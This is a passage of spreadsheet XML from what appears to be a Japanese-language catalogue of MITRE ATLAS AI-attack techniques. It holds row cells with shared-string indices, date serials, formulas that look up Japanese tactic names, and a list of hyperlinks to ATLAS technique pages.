      </c>
      <c r="G84" s="17">
        <v>45769</v>
      </c>
      <c r="H84" s="14" t="str">
        <f>'tactics (ja)'!$C$13&amp;"、"&amp;'tactics (ja)'!$C$16</f>
        <v>永続化、リソースの開発</v>
      </c>
      <c r="I84" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="85" ht="30" spans="1:9">
      <c r="A85" s="14" t="s">
        <v>443</v>
      </c>
      <c r="B85" s="15" t="s">
        <v>444</v>
      </c>
      <c r="C85" s="19" t="s">
        <v>970</v>
      </c>
      <c r="D85" s="19" t="s">
        <v>971</v>
      </c>
      <c r="E85" s="16" t="s">
        <v>447</v>
      </c>
      <c r="F85" s="17">
        <v>45769</v>
      </c>
      <c r="G85" s="17">
        <v>45769</v>
      </c>
      <c r="H85" s="14" t="str">
        <f>'tactics (ja)'!$C$15</f>
        <v>偵察</v>
      </c>
      <c r="I85" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="86" ht="30" spans="1:9">
      <c r="A86" s="14" t="s">
        <v>448</v>
      </c>
      <c r="B86" s="15" t="s">
        <v>449</v>
      </c>
      <c r="C86" s="14" t="s">
        <v>972</v>
      </c>
      <c r="D86" s="15" t="s">
        <v>973</v>
      </c>
      <c r="E86" s="16" t="s">
        <v>452</v>
      </c>
      <c r="F86" s="17">
        <v>45769</v>
      </c>
      <c r="G86" s="17">
        <v>45769</v>
      </c>
      <c r="H86" s="14" t="str">
        <f>'tactics (ja)'!$C$16</f>
        <v>リソースの開発</v>
      </c>
      <c r="I86" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="87" ht="30" spans="1:9">
      <c r="A87" s="14" t="s">
        <v>453</v>
      </c>
      <c r="B87" s="15" t="s">
        <v>454</v>
      </c>
      <c r="C87" s="19" t="s">
        <v>974</v>
      </c>
      <c r="D87" s="19" t="s">
        <v>975</v>
      </c>
      <c r="E87" s="16" t="s">
        <v>457</v>
      </c>
      <c r="F87" s="17">
        <v>45769</v>
      </c>
      <c r="G87" s="17">
        <v>45769</v>
      </c>
      <c r="H87" s="14" t="str">
        <f>'tactics (ja)'!$C$16</f>
        <v>リソースの開発</v>
      </c>
      <c r="I87" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="88" ht="30" spans="1:9">
      <c r="A88" s="14" t="s">
        <v>458</v>
      </c>
      <c r="B88" s="15" t="s">
        <v>459</v>
      </c>
      <c r="C88" s="19" t="s">
        <v>976</v>
      </c>
      <c r="D88" s="15" t="s">
        <v>977</v>
      </c>
      <c r="E88" s="16" t="s">
        <v>462</v>
      </c>
      <c r="F88" s="17">
        <v>45769</v>
      </c>
      <c r="G88" s="17">
        <v>45769</v>
      </c>
      <c r="H88" s="14" t="str">
        <f>'tactics (ja)'!C16</f>
        <v>リソースの開発</v>
      </c>
      <c r="I88" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="89" ht="60" spans="1:9">
      <c r="A89" s="14" t="s">
        <v>463</v>
      </c>
      <c r="B89" s="15" t="s">
        <v>464</v>
      </c>
      <c r="C89" s="14" t="s">
        <v>978</v>
      </c>
      <c r="D89" s="15" t="s">
        <v>979</v>
      </c>
      <c r="E89" s="16" t="s">
        <v>467</v>
      </c>
      <c r="F89" s="17">
        <v>45769</v>
      </c>
      <c r="G89" s="17">
        <v>45769</v>
      </c>
      <c r="H89" s="14" t="str">
        <f>'tactics (ja)'!$C$13</f>
        <v>永続化</v>
      </c>
      <c r="I89" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="90" ht="30" spans="1:9">
      <c r="A90" s="14" t="s">
        <v>468</v>
      </c>
      <c r="B90" s="15" t="s">
        <v>469</v>
      </c>
      <c r="C90" s="14" t="s">
        <v>980</v>
      </c>
      <c r="D90" s="19" t="s">
        <v>981</v>
      </c>
      <c r="E90" s="16" t="s">
        <v>472</v>
      </c>
      <c r="F90" s="17">
        <v>45769</v>
      </c>
      <c r="G90" s="17">
        <v>45769</v>
      </c>
      <c r="H90" s="14" t="str">
        <f>'tactics (ja)'!$C$11</f>
        <v>影響</v>
      </c>
      <c r="I90" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="91" ht="90" spans="1:9">
      <c r="A91" s="14" t="s">
        <v>473</v>
      </c>
      <c r="B91" s="15" t="s">
        <v>474</v>
      </c>
      <c r="C91" s="14" t="s">
        <v>982</v>
      </c>
      <c r="D91" s="15" t="s">
        <v>983</v>
      </c>
      <c r="E91" s="16" t="s">
        <v>477</v>
      </c>
      <c r="F91" s="17">
        <v>45769</v>
      </c>
      <c r="G91" s="17">
        <v>45769</v>
      </c>
      <c r="H91" s="14" t="str">
        <f>'tactics (ja)'!$C$16</f>
        <v>リソースの開発</v>
      </c>
      <c r="I91" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="92" ht="45" spans="1:9">
      <c r="A92" s="14" t="s">
        <v>478</v>
      </c>
      <c r="B92" s="15" t="s">
        <v>479</v>
      </c>
      <c r="C92" s="14" t="s">
        <v>984</v>
      </c>
      <c r="D92" s="15" t="s">
        <v>985</v>
      </c>
      <c r="E92" s="16" t="s">
        <v>482</v>
      </c>
      <c r="F92" s="17">
        <v>45769</v>
      </c>
      <c r="G92" s="17">
        <v>45769</v>
      </c>
      <c r="H92" s="14" t="str">
        <f>'tactics (ja)'!$C$5</f>
        <v>コマンド＆コントロール</v>
      </c>
      <c r="I92" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="93" ht="45" spans="1:9">
      <c r="A93" s="14" t="s">
        <v>484</v>
      </c>
      <c r="B93" s="15" t="s">
        <v>485</v>
      </c>
      <c r="C93" s="19" t="s">
        <v>986</v>
      </c>
      <c r="D93" s="19" t="s">
        <v>987</v>
      </c>
      <c r="E93" s="16" t="s">
        <v>488</v>
      </c>
      <c r="F93" s="17">
        <v>45769</v>
      </c>
      <c r="G93" s="17">
        <v>45769</v>
      </c>
      <c r="H93" s="14" t="str">
        <f>'tactics (ja)'!$C$15</f>
        <v>偵察</v>
      </c>
      <c r="I93" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="94" ht="45" spans="1:9">
      <c r="A94" s="14" t="s">
        <v>489</v>
      </c>
      <c r="B94" s="15" t="s">
        <v>490</v>
      </c>
      <c r="C94" s="19" t="s">
        <v>988</v>
      </c>
      <c r="D94" s="15" t="s">
        <v>989</v>
      </c>
      <c r="E94" s="16" t="s">
        <v>493</v>
      </c>
      <c r="F94" s="17">
        <v>45769</v>
      </c>
      <c r="G94" s="17">
        <v>45769</v>
      </c>
      <c r="H94" s="14" t="str">
        <f>'tactics (ja)'!$C$15</f>
        <v>偵察</v>
      </c>
      <c r="I94" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="95" ht="75" spans="1:9">
      <c r="A95" s="14" t="s">
        <v>494</v>
      </c>
      <c r="B95" s="15" t="s">
        <v>495</v>
      </c>
      <c r="C95" s="14" t="s">
        <v>990</v>
      </c>
      <c r="D95" s="15" t="s">
        <v>991</v>
      </c>
      <c r="E95" s="16" t="s">
        <v>498</v>
      </c>
      <c r="F95" s="17">
        <v>45769</v>
      </c>
      <c r="G95" s="17">
        <v>45769</v>
      </c>
      <c r="H95" s="14" t="str">
        <f>'tactics (ja)'!$C$15</f>
        <v>偵察</v>
      </c>
      <c r="I95" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="96" ht="90" spans="1:9">
      <c r="A96" s="14" t="s">
        <v>499</v>
      </c>
      <c r="B96" s="15" t="s">
        <v>500</v>
      </c>
      <c r="C96" s="19" t="s">
        <v>992</v>
      </c>
      <c r="D96" s="15" t="s">
        <v>993</v>
      </c>
      <c r="E96" s="16" t="s">
        <v>503</v>
      </c>
      <c r="F96" s="17">
        <v>45769</v>
      </c>
      <c r="G96" s="17">
        <v>45769</v>
      </c>
      <c r="H96" s="14" t="str">
        <f>'tactics (ja)'!$C$15</f>
        <v>偵察</v>
      </c>
      <c r="I96" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="97" ht="75" spans="1:9">
      <c r="A97" s="14" t="s">
        <v>504</v>
      </c>
      <c r="B97" s="15" t="s">
        <v>505</v>
      </c>
      <c r="C97" s="14" t="s">
        <v>994</v>
      </c>
      <c r="D97" s="15" t="s">
        <v>995</v>
      </c>
      <c r="E97" s="16" t="s">
        <v>508</v>
      </c>
      <c r="F97" s="17">
        <v>45769</v>
      </c>
      <c r="G97" s="17">
        <v>45769</v>
      </c>
      <c r="H97" s="14" t="str">
        <f>'tactics (ja)'!$C$10</f>
        <v>持出し</v>
      </c>
      <c r="I97" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="98" ht="30" spans="1:9">
      <c r="A98" s="14" t="s">
        <v>509</v>
      </c>
      <c r="B98" s="15" t="s">
        <v>510</v>
      </c>
      <c r="C98" s="19" t="s">
        <v>996</v>
      </c>
      <c r="D98" s="19" t="s">
        <v>997</v>
      </c>
      <c r="E98" s="16" t="s">
        <v>513</v>
      </c>
      <c r="F98" s="17">
        <v>45769</v>
      </c>
      <c r="G98" s="17">
        <v>45769</v>
      </c>
      <c r="H98" s="14" t="str">
        <f>'tactics (ja)'!$C$11</f>
        <v>影響</v>
      </c>
      <c r="I98" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="99" ht="30" spans="1:9">
      <c r="A99" s="14" t="s">
        <v>514</v>
      </c>
      <c r="B99" s="15" t="s">
        <v>515</v>
      </c>
      <c r="C99" s="19" t="s">
        <v>998</v>
      </c>
      <c r="D99" s="19" t="s">
        <v>999</v>
      </c>
      <c r="E99" s="20" t="s">
        <v>518</v>
      </c>
      <c r="F99" s="17">
        <v>45769</v>
      </c>
      <c r="G99" s="17">
        <v>45769</v>
      </c>
      <c r="H99" s="14" t="str">
        <f>'tactics (ja)'!$C$16</f>
        <v>リソースの開発</v>
      </c>
      <c r="I99" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="100" ht="30" spans="1:9">
      <c r="A100" s="14" t="s">
        <v>519</v>
      </c>
      <c r="B100" s="15" t="s">
        <v>520</v>
      </c>
      <c r="C100" s="19" t="s">
        <v>1000</v>
      </c>
      <c r="D100" s="19" t="s">
        <v>1001</v>
      </c>
      <c r="E100" s="16" t="s">
        <v>523</v>
      </c>
      <c r="F100" s="17">
        <v>45769</v>
      </c>
      <c r="G100" s="17">
        <v>45769</v>
      </c>
      <c r="H100" s="14" t="str">
        <f>'tactics (ja)'!$C$11</f>
        <v>影響</v>
      </c>
      <c r="I100" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="101" ht="30" spans="1:9">
      <c r="A101" s="14" t="s">
        <v>524</v>
      </c>
      <c r="B101" s="15" t="s">
        <v>525</v>
      </c>
      <c r="C101" s="19" t="s">
        <v>1002</v>
      </c>
      <c r="D101" s="19" t="s">
        <v>1003</v>
      </c>
      <c r="E101" s="16" t="s">
        <v>528</v>
      </c>
      <c r="F101" s="17">
        <v>45769</v>
      </c>
      <c r="G101" s="17">
        <v>45769</v>
      </c>
      <c r="H101" s="14" t="str">
        <f>'tactics (ja)'!$C$12</f>
        <v>初期アクセス</v>
      </c>
      <c r="I101" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="102" ht="30" spans="1:9">
      <c r="A102" s="14" t="s">
        <v>529</v>
      </c>
      <c r="B102" s="15" t="s">
        <v>530</v>
      </c>
      <c r="C102" s="14" t="s">
        <v>1004</v>
      </c>
      <c r="D102" s="15" t="s">
        <v>1005</v>
      </c>
      <c r="E102" s="16" t="s">
        <v>533</v>
      </c>
      <c r="F102" s="17">
        <v>45769</v>
      </c>
      <c r="G102" s="17">
        <v>45769</v>
      </c>
      <c r="H102" s="14" t="str">
        <f>'tactics (ja)'!$C$8</f>
        <v>探索</v>
      </c>
      <c r="I102" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="103" ht="90" spans="1:9">
      <c r="A103" s="14" t="s">
        <v>534</v>
      </c>
      <c r="B103" s="15" t="s">
        <v>535</v>
      </c>
      <c r="C103" s="14" t="s">
        <v>1006</v>
      </c>
      <c r="D103" s="15" t="s">
        <v>1007</v>
      </c>
      <c r="E103" s="20" t="s">
        <v>538</v>
      </c>
      <c r="F103" s="17">
        <v>45769</v>
      </c>
      <c r="G103" s="17">
        <v>45769</v>
      </c>
      <c r="H103" s="14" t="str">
        <f>'tactics (ja)'!$C$16</f>
        <v>リソースの開発</v>
      </c>
      <c r="I103" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="104" spans="1:9">
      <c r="A104" s="14" t="s">
        <v>539</v>
      </c>
      <c r="B104" s="15" t="s">
        <v>540</v>
      </c>
      <c r="C104" s="14" t="s">
        <v>1008</v>
      </c>
      <c r="D104" s="15" t="s">
        <v>1009</v>
      </c>
      <c r="E104" s="16" t="s">
        <v>543</v>
      </c>
      <c r="F104" s="17">
        <v>45769</v>
      </c>
      <c r="G104" s="17">
        <v>45769</v>
      </c>
      <c r="H104" s="14" t="str">
        <f>'tactics (ja)'!$C$8</f>
        <v>探索</v>
      </c>
      <c r="I104" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="105" ht="30" spans="1:9">
      <c r="A105" s="14" t="s">
        <v>544</v>
      </c>
      <c r="B105" s="15" t="s">
        <v>545</v>
      </c>
      <c r="C105" s="14" t="s">
        <v>1010</v>
      </c>
      <c r="D105" s="15" t="s">
        <v>1011</v>
      </c>
      <c r="E105" s="16" t="s">
        <v>548</v>
      </c>
      <c r="F105" s="17">
        <v>45769</v>
      </c>
      <c r="G105" s="17">
        <v>45769</v>
      </c>
      <c r="H105" s="14" t="str">
        <f>'tactics (ja)'!$C$8</f>
        <v>探索</v>
      </c>
      <c r="I105" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="106" ht="45" spans="1:9">
      <c r="A106" s="14" t="s">
        <v>549</v>
      </c>
      <c r="B106" s="15" t="s">
        <v>550</v>
      </c>
      <c r="C106" s="19" t="s">
        <v>1012</v>
      </c>
      <c r="D106" s="15" t="s">
        <v>1013</v>
      </c>
      <c r="E106" s="16" t="s">
        <v>553</v>
      </c>
      <c r="F106" s="17">
        <v>45769</v>
      </c>
      <c r="G106" s="17">
        <v>45769</v>
      </c>
      <c r="H106" s="14" t="str">
        <f>'tactics (ja)'!$C$15</f>
        <v>偵察</v>
      </c>
      <c r="I106" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="107" ht="30" spans="1:9">
      <c r="A107" s="14" t="s">
        <v>554</v>
      </c>
      <c r="B107" s="15" t="s">
        <v>555</v>
      </c>
      <c r="C107" s="19" t="s">
        <v>1014</v>
      </c>
      <c r="D107" s="15" t="s">
        <v>1015</v>
      </c>
      <c r="E107" s="20" t="s">
        <v>558</v>
      </c>
      <c r="F107" s="17">
        <v>45769</v>
      </c>
      <c r="G107" s="17">
        <v>45769</v>
      </c>
      <c r="H107" s="14" t="str">
        <f>'tactics (ja)'!$C$2</f>
        <v>AI 攻撃のステージング</v>
      </c>
      <c r="I107" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="108" ht="75" spans="1:9">
      <c r="A108" s="14" t="s">
        <v>559</v>
      </c>
      <c r="B108" s="15" t="s">
        <v>560</v>
      </c>
      <c r="C108" s="19" t="s">
        <v>1016</v>
      </c>
      <c r="D108" s="15" t="s">
        <v>1017</v>
      </c>
      <c r="E108" s="20" t="s">
        <v>563</v>
      </c>
      <c r="F108" s="17">
        <v>45769</v>
      </c>
      <c r="G108" s="17">
        <v>45769</v>
      </c>
      <c r="H108" s="14" t="str">
        <f>'tactics (ja)'!$C$2</f>
        <v>AI 攻撃のステージング</v>
      </c>
      <c r="I108" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="109" ht="45" spans="1:9">
      <c r="A109" s="14" t="s">
        <v>564</v>
      </c>
      <c r="B109" s="15" t="s">
        <v>565</v>
      </c>
      <c r="C109" s="14" t="s">
        <v>1018</v>
      </c>
      <c r="D109" s="15" t="s">
        <v>1019</v>
      </c>
      <c r="E109" s="16" t="s">
        <v>568</v>
      </c>
      <c r="F109" s="17">
        <v>45769</v>
      </c>
      <c r="G109" s="17">
        <v>45769</v>
      </c>
      <c r="H109" s="14" t="str">
        <f>'tactics (ja)'!$C$9</f>
        <v>実行</v>
      </c>
      <c r="I109" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="110" ht="30" spans="1:9">
      <c r="A110" s="14" t="s">
        <v>569</v>
      </c>
      <c r="B110" s="15" t="s">
        <v>570</v>
      </c>
      <c r="C110" s="19" t="s">
        <v>1020</v>
      </c>
      <c r="D110" s="15" t="s">
        <v>1021</v>
      </c>
      <c r="E110" s="16" t="s">
        <v>573</v>
      </c>
      <c r="F110" s="17">
        <v>45769</v>
      </c>
      <c r="G110" s="17">
        <v>45769</v>
      </c>
      <c r="H110" s="14" t="str">
        <f>'tactics (ja)'!$C$6</f>
        <v>資格情報へのアクセス</v>
      </c>
      <c r="I110" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="111" ht="30" spans="1:9">
      <c r="A111" s="14" t="s">
        <v>575</v>
      </c>
      <c r="B111" s="15" t="s">
        <v>576</v>
      </c>
      <c r="C111" s="19" t="s">
        <v>1022</v>
      </c>
      <c r="D111" s="19" t="s">
        <v>1023</v>
      </c>
      <c r="E111" s="20" t="s">
        <v>579</v>
      </c>
      <c r="F111" s="17">
        <v>45769</v>
      </c>
      <c r="G111" s="17">
        <v>45769</v>
      </c>
      <c r="H111" s="14" t="str">
        <f>'tactics (ja)'!$C$2</f>
        <v>AI 攻撃のステージング</v>
      </c>
      <c r="I111" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="112" ht="30" spans="1:9">
      <c r="A112" s="14" t="s">
        <v>580</v>
      </c>
      <c r="B112" s="15" t="s">
        <v>581</v>
      </c>
      <c r="C112" s="19" t="s">
        <v>1024</v>
      </c>
      <c r="D112" s="15" t="s">
        <v>1025</v>
      </c>
      <c r="E112" s="16" t="s">
        <v>584</v>
      </c>
      <c r="F112" s="17">
        <v>45769</v>
      </c>
      <c r="G112" s="17">
        <v>45769</v>
      </c>
      <c r="H112" s="14" t="str">
        <f>'tactics (ja)'!$C$9</f>
        <v>実行</v>
      </c>
      <c r="I112" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="113" spans="1:9">
      <c r="A113" s="14" t="s">
        <v>585</v>
      </c>
      <c r="B113" s="15" t="s">
        <v>586</v>
      </c>
      <c r="C113" s="19" t="s">
        <v>1026</v>
      </c>
      <c r="D113" s="19" t="s">
        <v>1027</v>
      </c>
      <c r="E113" s="16" t="s">
        <v>589</v>
      </c>
      <c r="F113" s="17">
        <v>45769</v>
      </c>
      <c r="G113" s="17">
        <v>45769</v>
      </c>
      <c r="H113" s="14" t="str">
        <f>'tactics (ja)'!$C$11</f>
        <v>影響</v>
      </c>
      <c r="I113" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="114" ht="60" spans="1:9">
      <c r="A114" s="14" t="s">
        <v>590</v>
      </c>
      <c r="B114" s="15" t="s">
        <v>591</v>
      </c>
      <c r="C114" s="19" t="s">
        <v>1028</v>
      </c>
      <c r="D114" s="19" t="s">
        <v>1029</v>
      </c>
      <c r="E114" s="16" t="s">
        <v>594</v>
      </c>
      <c r="F114" s="17">
        <v>45769</v>
      </c>
      <c r="G114" s="17">
        <v>45769</v>
      </c>
      <c r="H114" s="14" t="str">
        <f>'tactics (ja)'!$C$12</f>
        <v>初期アクセス</v>
      </c>
      <c r="I114" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="115" ht="30" spans="1:9">
      <c r="A115" s="14" t="s">
        <v>595</v>
      </c>
      <c r="B115" s="15" t="s">
        <v>596</v>
      </c>
      <c r="C115" s="19" t="s">
        <v>1030</v>
      </c>
      <c r="D115" s="19" t="s">
        <v>1031</v>
      </c>
      <c r="E115" s="20" t="s">
        <v>599</v>
      </c>
      <c r="F115" s="17">
        <v>45769</v>
      </c>
      <c r="G115" s="17">
        <v>45769</v>
      </c>
      <c r="H115" s="14" t="str">
        <f>'tactics (ja)'!$C$2</f>
        <v>AI 攻撃のステージング</v>
      </c>
      <c r="I115" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="116" spans="1:9">
      <c r="A116" s="14" t="s">
        <v>600</v>
      </c>
      <c r="B116" s="15" t="s">
        <v>601</v>
      </c>
      <c r="C116" s="19" t="s">
        <v>1032</v>
      </c>
      <c r="D116" s="19" t="s">
        <v>1033</v>
      </c>
      <c r="E116" s="16" t="s">
        <v>604</v>
      </c>
      <c r="F116" s="17">
        <v>45769</v>
      </c>
      <c r="G116" s="17">
        <v>45769</v>
      </c>
      <c r="H116" s="14" t="str">
        <f>'tactics (ja)'!$C$2</f>
        <v>AI 攻撃のステージング</v>
      </c>
      <c r="I116" s="14" t="s">
        <v>16</v>
      </c>
    </row>
  </sheetData>
  <hyperlinks>
    <hyperlink ref="E2" r:id="rId1" display="https://atlas.mitre.org/techniques/AML.T0035"/>
    <hyperlink ref="E3" r:id="rId2" display="https://atlas.mitre.org/techniques/AML.T0008.000"/>
    <hyperlink ref="E4" r:id="rId3" display="https://atlas.mitre.org/techniques/AML.T0048.004"/>
    <hyperlink ref="E5" r:id="rId4" display="https://atlas.mitre.org/techniques/AML.T0040"/>
    <hyperlink ref="E6" r:id="rId5" display="https://atlas.mitre.org/techniques/AML.T0010.001"/>
    <hyperlink ref="E7" r:id="rId6" display="https://atlas.mitre.org/techniques/AML.T0010"/>
    <hyperlink ref="E8" r:id="rId7" display="https://atlas.mitre.org/techniques/AML.T0047"/>
    <hyperlink ref="E9" r:id="rId8" display="https://atlas.mitre.org/techniques/AML.T0008"/>
    <hyperlink ref="E10" r:id="rId9" display="https://atlas.mitre.org/techniques/AML.T0002"/>
    <hyperlink ref="E11" r:id="rId10" display="https://atlas.mitre.org/techniques/AML.T0006"/>
    <hyperlink ref="E12" r:id="rId11" display="https://atlas.mitre.org/techniques/AML.T0016.000"/>
    <hyperlink ref="E13" r:id="rId12" display="https://atlas.mitre.org/techniques/AML.T0017.000"/>
    <hyperlink ref="E14" r:id="rId13" display="https://atlas.mitre.org/techniques/AML.T0043.001"/>
    <hyperlink ref="E15" r:id="rId14" display="https://atlas.mitre.org/techniques/AML.T0043.002"/>
    <hyperlink ref="E16" r:id="rId15" display="https://atlas.mitre.org/techniques/AML.T0067.000"/>
    <hyperlink ref="E17" r:id="rId16" display="https://atlas.mitre.org/techniques/AML.T0075"/>
    <hyperlink ref="E18" r:id="rId17" display="https://atlas.mitre.org/techniques/AML.T0050"/>
    <hyperlink ref="E19" r:id="rId18" display="https://atlas.mitre.org/techniques/AML.T0008.001"/>
    <hyperlink ref="E20" r:id="rId19" display="https://atlas.mitre.org/techniques/AML.T0010.004"/>
    <hyperlink ref="E21" r:id="rId20" display="https://atlas.mitre.org/techniques/AML.T0076"/>
    <hyperlink ref="E22" r:id="rId21" display="https://atlas.mitre.org/techniques/AML.T0034"/>
    <hyperlink ref="E23" r:id="rId22" display="https://atlas.mitre.org/techniques/AML.T0043"/>
    <hyperlink ref="E24" r:id="rId23" display="https://atlas.mitre.org/techniques/AML.T0005"/>
    <hyperlink ref="E25" r:id="rId24" display="https://atlas.mitre.org/techniques/AML.T0010.002"/>
    <hyperlink ref="E26" r:id="rId25" display="https://atlas.mitre.org/techniques/AML.T0036"/>
    <hyperlink ref="E27" r:id="rId26" display="https://atlas.mitre.org/techniques/AML.T0037"/>
    <hyperlink ref="E28" r:id="rId27" display="https://atlas.mitre.org/techniques/AML.T0002.000"/>
    <hyperlink ref="E29" r:id="rId28" display="https://atlas.mitre.org/techniques/AML.T0029"/>
    <hyperlink ref="E30" r:id="rId29" display="https://atlas.mitre.org/techniques/AML.T0017"/>
    <hyperlink ref="E31" r:id="rId30" display="https://atlas.mitre.org/techniques/AML.T0051.000"/>
    <hyperlink ref="E32" r:id="rId31" display="https://atlas.mitre.org/techniques/AML.T0007"/>
    <hyperlink ref="E33" r:id="rId32" display="https://atlas.mitre.org/techniques/AML.T0014"/>
    <hyperlink ref="E34" r:id="rId33" display="https://atlas.mitre.org/techniques/AML.T0013"/>
    <hyperlink ref="E35" r:id="rId34" display="https://atlas.mitre.org/techniques/AML.T0063"/>
    <hyperlink ref="E36" r:id="rId35" display="https://atlas.mitre.org/techniques/AML.T0062"/>
    <hyperlink ref="E37" r:id="rId36" display="https://atlas.mitre.org/techniques/AML.T0069"/>
    <hyperlink ref="E38" r:id="rId37" display="https://atlas.mitre.org/techniques/AML.T0008.002"/>
    <hyperlink ref="E39" r:id="rId38" display="https://atlas.mitre.org/techniques/AML.T0078"/>
    <hyperlink ref="E40" r:id="rId39" display="https://atlas.mitre.org/techniques/AML.T0018.002"/>
    <hyperlink ref="E41" r:id="rId40" display="https://atlas.mitre.org/techniques/AML.T0031"/>
    <hyperlink ref="E42" r:id="rId41" display="https://atlas.mitre.org/techniques/AML.T0059"/>
    <hyperlink ref="E43" r:id="rId42" display="https://atlas.mitre.org/techniques/AML.T0021"/>
    <hyperlink ref="E44" r:id="rId43" display="https://atlas.mitre.org/techniques/AML.T0015"/>
    <hyperlink ref="E45" r:id="rId44" display="https://atlas.mitre.org/techniques/AML.T0024"/>
    <hyperlink ref="E46" r:id="rId45" display="https://atlas.mitre.org/techniques/AML.T0025"/>
    <hyperlink ref="E47" r:id="rId46" display="https://atlas.mitre.org/techniques/AML.T0049"/>
    <hyperlink ref="E48" r:id="rId47" display="https://atlas.mitre.org/techniques/AML.T0048"/>
    <hyperlink ref="E49" r:id="rId48" display="https://atlas.mitre.org/techniques/AML.T0024.002"/>
    <hyperlink ref="E50" r:id="rId49" display="https://atlas.mitre.org/techniques/AML.T0056"/>
    <hyperlink ref="E51" r:id="rId50" display="https://atlas.mitre.org/techniques/AML.T0071"/>
    <hyperlink ref="E52" r:id="rId51" display="https://atlas.mitre.org/techniques/AML.T0048.000"/>
    <hyperlink ref="E53" r:id="rId52" display="https://atlas.mitre.org/techniques/AML.T0044"/>
    <hyperlink ref="E54" r:id="rId53" display="https://atlas.mitre.org/techniques/AML.T0064"/>
    <hyperlink ref="E55" r:id="rId54" display="https://atlas.mitre.org/techniques/AML.T0016.002"/>
    <hyperlink ref="E56" r:id="rId55" display="https://atlas.mitre.org/techniques/AML.T0010.000"/>
    <hyperlink ref="E57" r:id="rId56" display="https://atlas.mitre.org/techniques/AML.T0073"/>
    <hyperlink ref="E58" r:id="rId57" display="https://atlas.mitre.org/techniques/AML.T0051.001"/>
    <hyperlink ref="E59" r:id="rId58" display="https://atlas.mitre.org/techniques/AML.T0024.000"/>
    <hyperlink ref="E60" r:id="rId59" display="https://atlas.mitre.org/techniques/AML.T0043.004"/>
    <hyperlink ref="E61" r:id="rId60" display="https://atlas.mitre.org/techniques/AML.T0024.001"/>
    <hyperlink ref="E62" r:id="rId61" display="https://atlas.mitre.org/techniques/AML.T0000.000"/>
    <hyperlink ref="E63" r:id="rId62" display="https://atlas.mitre.org/techniques/AML.T0057"/>
    <hyperlink ref="E64" r:id="rId63" display="https://atlas.mitre.org/techniques/AML.T0054"/>
    <hyperlink ref="E65" r:id="rId64" display="https://atlas.mitre.org/techniques/AML.T0053"/>
    <hyperlink ref="E66" r:id="rId65" display="https://atlas.mitre.org/techniques/AML.T0065"/>
    <hyperlink ref="E67" r:id="rId66" display="https://atlas.mitre.org/techniques/AML.T0051"/>
    <hyperlink ref="E68" r:id="rId67" display="https://atlas.mitre.org/techniques/AML.T0068"/>
    <hyperlink ref="E69" r:id="rId68" display="https://atlas.mitre.org/techniques/AML.T0061"/>
    <hyperlink ref="E70" r:id="rId69" display="https://atlas.mitre.org/techniques/AML.T0077"/>
    <hyperlink ref="E71" r:id="rId70" display="https://atlas.mitre.org/techniques/AML.T0067"/>
    <hyperlink ref="E72" r:id="rId71" display="https://atlas.mitre.org/techniques/AML.T0011.001"/>
    <hyperlink ref="E73" r:id="rId72" display="https://atlas.mitre.org/techniques/AML.T0018"/>
    <hyperlink ref="E74" r:id="rId73" display="https://atlas.mitre.org/techniques/AML.T0043.003"/>
    <hyperlink ref="E75" r:id="rId74" display="https://atlas.mitre.org/techniques/AML.T0074"/>
    <hyperlink ref="E76" r:id="rId75" display="https://atlas.mitre.org/techniques/AML.T0010.003"/>
    <hyperlink ref="E77" r:id="rId76" display="https://atlas.mitre.org/techniques/AML.T0002.001"/>
    <hyperlink ref="E78" r:id="rId77" display="https://atlas.mitre.org/techniques/AML.T0018.001"/>
    <hyperlink ref="E79" r:id="rId78" display="https://atlas.mitre.org/techniques/AML.T0016"/>
    <hyperlink ref="E80" r:id="rId79" display="https://atlas.mitre.org/techniques/AML.T0052"/>
    <hyperlink ref="E81" r:id="rId80" display="https://atlas.mitre.org/techniques/AML.T0008.003"/>
    <hyperlink ref="E82" r:id="rId81" display="https://atlas.mitre.org/techniques/AML.T0041"/>
    <hyperlink ref="E83" r:id="rId82" display="https://atlas.mitre.org/techniques/AML.T0018.000"/>
    <hyperlink ref="E84" r:id="rId83" display="https://atlas.mitre.org/techniques/AML.T0020"/>
    <hyperlink ref="E85" r:id="rId84" display="https://atlas.mitre.org/techniques/AML.T0000.001"/>
    <hyperlink ref="E86" r:id="rId85" display="https://atlas.mitre.org/techniques/AML.T0060"/>
    <hyperlink ref="E87" r:id="rId86" display="https://atlas.mitre.org/techniques/AML.T0019"/>
    <hyperlink ref="E88" r:id="rId87" display="https://atlas.mitre.org/techniques/AML.T0058"/>
    <hyperlink ref="E89" r:id="rId88" display="https://atlas.mitre.org/techniques/AML.T0070"/>
    <hyperlink ref="E90" r:id="rId89" display="https://atlas.mitre.org/techniques/AML.T0048.001"/>
